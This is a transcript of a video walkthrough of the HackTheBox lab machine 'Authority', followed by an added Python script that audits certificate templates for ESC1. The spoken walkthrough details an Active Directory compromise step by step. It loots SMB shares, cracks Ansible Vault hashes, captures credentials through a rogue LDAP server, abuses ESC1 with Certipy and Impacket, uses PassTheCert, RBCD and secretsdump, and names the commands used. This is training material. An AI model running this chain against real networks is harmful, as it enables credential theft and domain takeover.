HackTheBox - Authority
Key Takeaways
The video demonstrates a cybersecurity attack on a Windows server using various tools and techniques, including nmap, Hashcat, and Impacket, to gain administrator access and exploit vulnerabilities.
Full Transcript
What's going on YouTube, this is IppSec. We're doing Authority from Hack The Box, which starts off with pillaging SMB shares. You find a bunch of Ansible playbooks, and the playbooks themselves use Ansible Vault, which encrypts some information, but you can crack them over in hashcat, get the password to decrypt, and that leaks some passwords they used to set up the server, most notably the password to access the PWM management interface. This is like a self-service password reset type of thing, but once you get into the management interface you can test the LDAP connection. You can insert your own LDAP server and have it connect back to you, so you steal the LDAP password, and that gets you credentials to the Windows server. From there you can do one of the Active Directory Certificate Services exploits, the ADCS ones; this one is ESC1. We have to create a machine account, and then we can use that machine account in order to become administrator. So with that being said, let's just jump in.

As always, we're going to start with nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it Authority, then the IP address of 10.10.11.222. This can take some time to run, so I've already run it. Looking at the results, we have quite a few ports open, it looks like 13. The first one is DNS, and it says Simple DNS Plus, so I'm thinking this is going to be Active Directory already. Skipping down, I see LDAP, LDAPS, and I'm guessing Kerberos is going to be listening as well somewhere. Let's see, oh yeah, up here, Kerberos. So we definitely have an Active Directory server. I'm just going to look for ports that stand out, like HTTP; that's just going to be IIS. We do have LDAP; it gives us a DNS name of authority.htb.corp, the DNS of htb.corp. So let's start adding things to our hosts file as we go: sudo vi /etc/hosts, and then we can add 10.10.11.222 authority.htb.corp. Let's give it authority as well, and authority.htb. I always like giving it every combination of the name that we can. Scrolling down more, SSL stuff, lots of SSL. We also have 8443, and this is going to a website, /pwm, and that may be it.

One thing I like doing whenever I have Windows is just do a quick NetExec, which is the new version of CrackMapExec, so we can run it against 10.10.11.222. I just like this because it gives me, or at least confirms, the domain name and the name. Oddly enough, we have the domain being authority.htb and the name being Authority. I don't see any .corp, which is a little odd, and it also looks odd with both the name and the domain being Authority. Generally you see that if it is a domain controller, it's something like DC or DC01. So this box's name is Authority, the domain is authority.htb, so we have all of the names.

I'm going to go to 10.10.11.222 (I had 111 typed), and this is the IIS page. If we go to 8443 it wants SSL. Going over here, it takes a while to load. I'm going to press F12 and look at my network tools when I reload; I just want to see if it's hung somewhere. It is getting blocked. Why is this blocked? Uh huh, it loaded eventually. Why "binding abort"? No. I wonder if it wants authority.htb:8443. Accept this. Does this page load any quicker? Is this in the console? I'm just going to try authority.authority. If that doesn't work we'll just move on. I don't know exactly why it's going slow; it's probably loading some domain name. Let's see what name the certificate thinks it is: common name 172.16... That's not going to work, so I'm guessing the IP address changed from when the machine was created, and it may think that's the IP and be throwing some weird errors. But it looks like everything works, it just goes a little bit slow. We have a username and password field and then two things, the Configuration Manager. We can see a username, svc_pwm. Users, we don't have any password. We could try brute forcing the password, but if we do we risk locking things out, right, so I don't ever like doing that. We go to Configuration Editor. Is that what we went to? I thought I clicked the first one here. Okay, they both look the same, so it wants a password. I'm going to try admin and see if we get in, but we don't. Try admin here as well. So all we get so far is a username of svc_pwm. So you can close these out, and let's check SMB.

So if we do a netexec smb --shares we can see it's not letting us in, but oddly enough if we do an invalid username and password it logs in. I forget exactly what type of login this is; I don't think it's a null session, maybe it's guest, but whatever this defaults to when you have an invalid password, it logs in. I think if you don't specify anything it's a null session, and then if you do, I forget what it is, but we can see we have read access over the Development share. So I could use the spider_plus module and crawl it, but I could also just go straight to smbclient, because I forgot the syntax to spider_plus but I know this one, so let's go this way. And if you want to, I'm sure if you went to ippsec.rocks and searched spider_plus, you could go to plenty of other videos where we do that. So Development, do a dir, we have an Automation directory, an Ansible directory, and a bunch of files. I'm going to go up to the directories, I'm going to type recurse on, and then I'm also going to type prompt, and this is just going to make sure the next thing doesn't prompt me every time I want to download something. So I do mget *, and it's going to automatically download every file here. If I didn't type prompt it would ask me for every single file if I'm sure I want to copy it, which is annoying. If I don't do recurse it's just going to, I think, make the directory and stop; it's not going to go in and download all the files, right. So this is going to download everything.

If I look at this directory now we have Automation/Ansible. I'm going to start looking at things while it downloads. I'm going to open it up in Visual Studio Code just because it makes navigating around this a little bit easier. There we go, I was wondering where it was. So I'm guessing this is going to be some VS Code modules, or not VS Code modules, Ansible modules for deploying everything, right. We have ADCS, so this is going to be Active Directory Certificate Services, maybe. Robert de Bock is another user. LDAP is probably going to configure LDAP, PWM is the website we were on, and SHARE, this could be the file share, right. We have C: and share internal; is there like a development share? Is that what we connected to? I don't see it. Let's see, yeah, I definitely don't see anything about a development share, and that is what we connected to, right. smbclient, it is. So maybe these Ansible things are out of date, or it's not for this domain, but it is similar technologies. If we look at the configuration variables we have a potential password of super secret. We could try CrackMapExec logging in with super secret as the password for, I guess, svc_pwm is the only thing, but I don't want to waste your time showing you it does not work. But that is what I would be doing if I hadn't solved this box before.

So clicking around, you can just kind of look at what things are. I like looking at all the variables first, so let's go here, defaults. If there is a vars directory I would look at that as well. Don't see anything there that looks standard, and what we look for is any hardcoded credentials. So hardcoded credentials generally will be in your variable files, so defaults is the default variables and vars is another place to store variables. So it's not in LDAP; let's go to PWM. If we go here we can see something right off the bat: we have pwm_admin_login, pwm_admin_password, ldap_admin_password. So we have three different ones. Let's save each of these. It's a bit of a pain to save these because the John module we're about to use doesn't allow multiple things per line, so we just have to do them one by one. So this will be pwm_admin_login. Do this replace all, like that; the command I did was just getting rid of spaces. So we can do pwm_admin_password next and add this, okay, and let's go to the next one, copy this. Okay, so now I can do a locate ansible2john. Where is that installed? It is here, so we can run that on, let's see, pwm_admin_login, pwm_admin_password and ldap. Okay, let's just redirect this to a file, ansible.hashes. So now we have this, let's copy it over to the Kraken, and this is just another box I have on my network. You can do it anywhere; I recommend doing it on your host. It's just easier for me in videos to do it off this machine. We go to the hashes directory, there we go, and then let's go into hashcat and we can run hashcat, and I'm going to guess we have to add the --username flag because it put the file name before the hash, and then we just specify hashes/ansible.hashes and then the wordlist of rockyou.txt, and let's see if it automatically detects a mode. It's probably going to detect it as some type of hash... there we go, 16900, Ansible Vault password manager, and it is starting up to crack.

I don't know exactly... okay, there we go. I was wondering why the run times were taking a little bit of time, and we got one, two, and all three have cracked. So I'm just going to do a --show after you get rid of the wordlist, and we can see every one is the same password. So I'm going to go and try this password on the password service. Inactivity, that is annoying. Let's just go here, Configuration Manager, that loaded actually pretty quickly. Type this password, and password incorrect. So let's try actually grabbing the data. So let's go back here. Let me exit hashcat, put the password back on my clipboard. Ansible Vault, okay, so I'm going to cat this and then let's pipe it over to ansible-vault decrypt, put in the password, and we get the first credential. So let's say, in the creds, this will be ldap_admin_password, is that okay? Okay. Let's go to the next file and this is ldap_admin_login, no, password, or no, admin password, oh, pwm_admin_login. I always hate copying out of Vim, so that's why you see me exit to grab that. So we also have the svc_pwm user, and that password is... oh, that is not a password, that is the login. So let's now get the pwm_admin_password, and we have the credential.

Okay, so let's try NetExec. So we can do netexec smb -u svc_pwm -p for the password. We probably have to put that in quotes because bash did funky things with the exclamation points and things. See, we need to give it a target, 10.10.11.222. Let's see, smb, a target, then protocol; that doesn't look right; it's protocol then target. There we go, and we can log in, but we can't really download anything. We can also do a --shares to see if there's anything else we can see now, because remember there were two shares, and access denied. Oh, the saying we could log in is probably going to be that weird thing where we did the invalid user and we could still see a directory. If you give it a valid username it's still going to say that's successful, right. So here we have this, let's see, success. If I give something that doesn't exist there it should still say success. Yep, so it's treating everything as a success, so we don't actually have the password.

We can try this password on the web service, so do this and we can log in. So let's see, we could try downloading the configuration, and let's save this to, I guess, Downloads and move it. So let's do cp Downloads/PwmConfiguration, cat this, or let's grep for svc_ because that's how the username was. We have svc_ldap. So if we look at this, I'm just looking around it to see if there's a password. We can search this for password, grep -i password on the pwm file, and nothing looks like a password, but we do have a new user, svc_ldap. So what I'm going to do is let's try NetExec, let's do svc_ldap; will this say we logged in? We don't. So now we actually have a valid user account. The svc_pwm probably wasn't a valid user account; every invalid user is treated as a successful login, but this is not. So let's go back to our creds and we can try the ldap_admin_password. So let's paste this in and it doesn't work. We can also try the pwm password. Maybe I typo'd that; I really don't think that was pw, that may have been pwm. Yeah, that's probably it. Do the invalid thing here. Nope, still treats everything as a success. Okay, so we don't have any credential.

So let's see what else we can do in this thing. There were two places we could go, right. We did the Configuration Manager; let's go to Configuration Editor, and it's not asking for a password because we already entered that one time. So if I go to LDAP settings, global, see, no, let's do directories, default connection. I'm trying to find this, right; I want to get the password out of this. So we have the LDAP user, the proxy; the password is stored. It doesn't look like the website is telling us the password of that account. If we go here, I was just looking in the source code; sometimes you'll see it hidden around in there, but that doesn't really happen nowadays anymore. But we can add more LDAP URLs, so let's add one and I'm going to point it at myself. We do ldap://10.10.14.8, which is my IP, and we do 389. Okay, and then we can do sudo nc -vnlp 389, and when we do Test LDAP Profile it comes back to us and the password is "ldap in the clear". It's kind of hard to see. We could also write it out to ldap.out. Let's see, it should connect again, right. From unknown, there we go. By cat ldap.out we see it there, and that will let us xxd it, and we can see there's two unknown characters; this is just separating the value of htb, so it becomes a little bit clearer there. But really the best way to do it is going to be Responder, right. Whenever it comes to man-in-the-middling anything from a Windows computer I use Responder. So we can do responder -I tun0, and if we look, the LDAP server is on. I wonder, what if we're listening on secure LDAP? Let's see, 389, it's like a six something; 1433, is that it? Let's see, I don't think 1433 is secure LDAP. Let's do ldaps authority... nmap 1433? No, it would be like 636, so I don't think Responder supports LDAPS. Maybe it does, but let's go and do Test LDAP Profile now, and we can see this spits it out pretty clearly; it parses the packet and gives us the credential. So svc_ldap is "ldap in the clear".

So let's go back to NetExec, so netexec smb 10.10.11.222 -u svc_ldap -p, put in the password, and we can also add it to our creds. We have it open somewhere, let's see. As we see, svc_ldap; fix our stupid typo, there we go. And let's see, I just want to make sure it says invalid login when we change that, so we don't have SMB access. We could do --shares now and see if there's any new thing we can read; we can now read the Department Shares share. So if I do smbclient -U svc_ldap //10.10.11.222/Department Shares; if I put this in quotes will that connect me? Capital U, password, where is "ldap in the clear". dir, recurse on, prompt, mget *. So now that's going to download everything. I don't think we have to, because this is looking very much like this, right, HR, R&D; it already downloaded. Let's see, I don't think it was in recurse mode, or those are empty; it's going to download anything. Oh God, I did dir and since recurse is on it tries to download everything. So this is a blank share, and I should have gone into a directory before doing this because it kind of clobbered my working structure.

So let's see, well, the box name is Authority, so we could probably go for Certipy, but before I do Certipy I want to check one last thing. See the creds. I normally test WinRM as well; we can test other protocols with this, netexec winrm, and make sure that doesn't let us log in, and it does. So we could log in with WinRM here, so we could do evil-winrm -i 10.10.11.222 -u svc_ldap -p that password, and we get logged in, and this can get us the user flag, probably right there. There we go. But whenever I check for any type of ADCS vulnerability I don't like doing it on a Windows box, primarily because when I'm doing pentesting, if you do it from Windows it's going to be .NET and it generally gets caught when you run it there. It's much, much easier to just run it from your box, and there is a tool called Certipy that does a really, really great job. So I'm going to do certipy find, -u svc_ldap, -p put in the password, and then we give it the target, which is authority.htb, -text, -stdout, and -vulnerable. This will take a couple seconds to run. It failed to connect to remote registry, but then it eventually did it, and we have the vulnerabilities: ESC1, and it's because enrolled computers can target this one. So we need a computer account to do this. The easiest way is just to create our own, but before we do that we should make sure we can create accounts.

So let's go back to our NetExec command. We'll do smb, and if you do -L it's going to list all the modules of SMB, and let's see, maybe it's LDAP we want. Let's do ldap, there we go, and we want the module maq; this is going to retrieve the machine account quota. We also need to specify our username, so I'm going to grab this just in case we don't have it actually, and copy both of these, and we should be able to specify the names after the module, right; it doesn't matter what order the arguments are in. And we can see svc_ldap has a machine quota of 10, which means I can add 10 computers to the domain. Why this is a default thing in Active Directory, where pretty much any user can add computers, I'm not exactly sure, but this will let us add a computer. Generally when you add the computer the password is randomized so you don't know it, but when you use the Impacket script to add the computer you can specify the password. So let's do addcomputer, and we'll specify the account we want to authenticate with, so authority/svc_ldap, the method we want to use is going to be LDAPS, the computer name we'll call ippsec, and the computer pass will be PleaseSubscribe!1, and I did that just for password complexity. We'll do one bang, there we go, and then -dc-ip 10.10.11.222. So this will add us the computer ippsec. Paste in the password; I had "10" on my clipboard. Let's grab "ldap in the clear". I bet if I did a colon after svc_ldap maybe that's how we can put a password in.

So now that we have this we can do the Certipy attack. So we can do certipy req, username ippsec, and the computer names end in a dollar, password PleaseSubscribe!1, and then after that we want to give it the CA, AUTHORITY-CA; normally it's going to be the domain then -CA, then -dc-ip 10.10.11.222, and I'm sure Certipy also told us that, right. Okay, so that did give us that. We want the template name of CorpVPN, right, yeah. So we did dc-ip, then template CorpVPN, -upn, we're going to become administrator@authority.htb. I think that's it, and you could get those flags while that goes. If we looked up the SpecterOps ESC1 talk, that will probably be a good talk that pretty much has most of that. NetBIOS timed out; there we go. I don't know why it didn't work the first time but it did work the second time, so we have the administrator certificate at administrator.pfx. I just did administrator because the default administrator for most Windows computers is named Administrator, right. We could test if that guy existed with CrackMapExec: if we did netexec with administrator like this, it should fail to log in, right, because we were getting login failures before when we did this. Yep, there we go, so we know administrator is a valid user, because if the user didn't exist, like "administrat", it will say success. So we know that user does exist. We could also use a tool like Kerbrute or something like that to enumerate valid usernames if the AD server didn't have this weird configuration. I wish I remembered what did that. But we do have that administrator.pfx file, so the next step will be to try to authenticate with it, so we can do certipy auth -pfx administrator.pfx, and we get this.

I bet if we search this page... let's see if we Google this with Certipy; maybe this is a new post. Let's see, go here, and it says when a domain controller doesn't have a certificate installed for smart cards you'll probably get this error message, and it does tell us we can use PassTheCert to get around this. So let's grab this application, so we'll do git clone PassTheCert, and man, our directory is awful, but let's go, and PassTheCert, they do have a Python one and it's just passthecert.py. So I'm going to copy that up a directory since there's no libraries; that way I just don't have to specify the path to run things. Let's clean up some of these directories: Accounting, Finance, HR, IT, Marketing, Operations, R&D, Sales. Okay, that's a little better. So to use PassTheCert we will have to break our certificate, because it has a key and a cert, into separate files. So we can do certipy cert -pfx administrator.pfx -nocert -out administrator.key. So now that took the key out of this group of certificates and just put it in its own file. So the next thing we can do is pretty much the same thing, except instead of -nocert we do -nokey, -out administrator.crt. So we have now extracted both the certificate and key from the pfx file, and that will enable us to do a PassTheCert. So we'll do python3 passthecert.py -action ldap-shell, specify the certificate of administrator.crt, the key administrator.key, then domain authority.htb, and I always specify dc-ip, and this is an Impacket script so we'll find out very soon. No route to host because I forgot a 2. We can do help and there's not many users here, not users, arguments, and that's because my Impacket is out of date. We can see it's from 2020; we would know that if we looked at this. So if I did less passthecert.py, it's getting the LDAP shell from just Impacket examples ldap_shell.

So let's install a more recent version of Impacket. I'm just going to google Impacket and I'm going to specify GitHub. Let's download it; we can do a git clone of this, we can go into impacket. Actually, before I do that, python3 -m venv venv; so that's going to create us a Python 3 virtual environment. Go into impacket, do pip3 install ., and this will install Impacket to this virtual environment, and this will be the new version of Impacket. So when we run the LDAP shell it's going to have a lot more options. So let's just hit up, same exact command I had run before, but this time our Impacket is a newer version, 2023 instead of 2020. I do help and we have a lot of options, so the option that sticks out most to me is going to be add_user_to_group, right. So if we run this, not enough values, expected two. Let's just try svc_ldap Administrators, and it says the result was okay. So now let's do a psexec; we can say svc_ldap@10.10.11.222, psexec.py, paste in the password, requesting share, uploading, starting, and we are admin, right. We could also do WinRM or anything to get this.

So that is the super easy way to do it, but there are other ways we could do it, because again we are LDAP, right, so that enables us to change any flag we want. I think set_rbcd was the intended way, so if we run this it expects the target and the grantee. So I'm going to give it the target of authority$, like this, and this is going to be the machine name; remember the machine hostname was Authority; normally it's going to be like DC or DC01, but it's Authority in this case. And we'll give it ippsec$, and it does not look like it added it, so maybe a machine cleanup script has deleted the ippsec machine. Let's do addcomputer; let's see, creds; I want to see, do I remember this right, is it colon then the password? Hey, that's how you do it in Impacket, awesome; I always forget that. So we can do, what was I doing next, we want to do PassTheCert, that's right, so that's going to get us in the LDAP shell, and then do the set_rbcd authority$ ippsec$, like that. And what we did is allowed ippsec$ to impersonate users on authority via S4U2Proxy, so essentially this just means ippsec$ can have delegation, so it becomes a domain controller. So what we're going to do is a getST, and we can say we want a service ticket of cifs/authority.authority.htb, so we're saying this guy has signed our ticket and he signed us to be administrator, and we're going to specify the target, so this is going to be the account we authenticate as. So we do authority.htb because that's the domain, then we can say ippsec$ because that's our computer, and then PleaseSubscribe!1 because that's the password to our computer account.

So when we do this, clock skew too great. Let's do sudo ntpdate 10.10.11.222, so this was just a Kerberos error that our clock was out of sync with the target. Maybe that's why it didn't work one time. No, that was really far out; it didn't sync; holy crap, that time. Let's try running this again. Okay, so now we have the administrator.ccache, so this is going to enable us to just become administrator. So let's do KRB5CCNAME=administrator.ccache, and let's just do a secretsdump. We can do secretsdump.py -k -no-pass authority.htb/administrator@authority.htb, and let's just say -just-dc-ntlm. That did not work; maybe we have to give it authority.authority, the fully qualified name. There we go, and there we have it, dumping all the creds. So that's going to be the box. Hope you guys enjoyed it, take care, and I will see you all next time.
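To look at the ESC1 finding from the defender's side, here is an added example (not IppSec's code and not Certipy's): it evaluates constructed template records shaped like the LDAP attributes a certificate template carries, flags the combination of conditions that makes a template ESC1, and shows the hardening change that clears it. The CorpVPN and WebServer template contents and enrollment rights below are invented sample data; the attribute names and flag bits are the real ones.

```python
"""Audit AD CS certificate templates for the ESC1 conditions (added example)."""

# Bit in msPKI-Certificate-Name-Flag: the requester may supply the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: requests are held for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let the issued certificate authenticate to the domain.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals that amount to "any user or machine in the domain".
LOW_PRIV_PRINCIPALS = {
    "Domain Users", "Domain Computers", "Authenticated Users", "Everyone",
}


def esc1_findings(template: dict) -> list[str]:
    """Return the ESC1 conditions this template meets (empty list = not ESC1).

    A template is ESC1 only when ALL four hold: the enrollee supplies the
    subject (so any UPN can be requested), an EKU permits client auth (or no
    EKU is set), no manager approval / authorized signature is required, and
    a low-privileged principal may enroll.
    """
    reasons = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject")
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    if not ekus or ekus & AUTH_EKUS:
        reasons.append("EKU allows client authentication")
    approval = template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
    if not approval and template.get("msPKI-RA-Signature", 0) == 0:
        reasons.append("no manager approval or authorized signature required")
    enrollers = set(template.get("enrollmentRights", [])) & LOW_PRIV_PRINCIPALS
    if enrollers:
        reasons.append("enrollable by " + ", ".join(sorted(enrollers)))
    return reasons if len(reasons) == 4 else []


def harden(template: dict) -> dict:
    """Copy of the template with ENROLLEE_SUPPLIES_SUBJECT cleared and
    manager approval required; either change alone breaks the ESC1 chain."""
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    fixed["msPKI-Enrollment-Flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    return fixed


# Constructed sample data: a template enrollable by Domain Computers (as in
# the video) next to one that is server-auth only and admin-enrollable.
SAMPLE_TEMPLATES = [
    {
        "name": "CorpVPN",
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"],
        "enrollmentRights": ["Domain Computers", "Domain Admins"],
    },
    {
        "name": "WebServer",
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],  # Server Authentication only
        "enrollmentRights": ["Domain Admins"],
    },
]


def audit(templates: list[dict]) -> dict[str, list[str]]:
    """Map each ESC1-vulnerable template name to the reasons it was flagged."""
    return {t["name"]: esc1_findings(t) for t in templates if esc1_findings(t)}


if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: ESC1 ({'; '.join(reasons)})")
```

Against a live domain the same checks apply to the template objects under CN=Certificate Templates in the Configuration partition, which is what a `certipy find -vulnerable` run reads.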
Original Description
00:00 - Introduction
00:58 - Start of nmap
03:30 - Taking a look at the website
05:50 - Using NetExec to search for file shares and discovering the Development share is open. Using smbclient to download everything
08:00 - Exploring the Ansible Playbooks in the Development Share to discover encrypted passwords (ansible vault)
10:00 - Converting the Ansible Vault Hashes to John/Hashcat format so we can crack them
13:30 - Decrypting the values and getting some passwords, one of which lets us log into PWM (webapp)
19:50 - Adding a rogue ldap server into the PWM Config, then clicking test config will send us the password for the ldap account
27:00 - Running Certipy to find the server is vulnerable to ESC1, we just need to enroll a computer
28:00 - Using NetExec to show the MachineAccountQuota, confirming we can enroll machines
29:00 - Using Impacket to add a rogue computer
30:00 - Using Certipy to perform the ESC1, it works but smart card login isn't enabled so we can't log in right away.
33:30 - Looking at the error message, finding we can PassTheCert to LDAP which then will let us get admin
37:15 - Using PassTheCert to add ourselves to the Domain Administrator group
39:25 - Showing PassTheCert to set_rbcd, which will give our rogue computer the ability to sign krb, allowing us to impersonate the administrator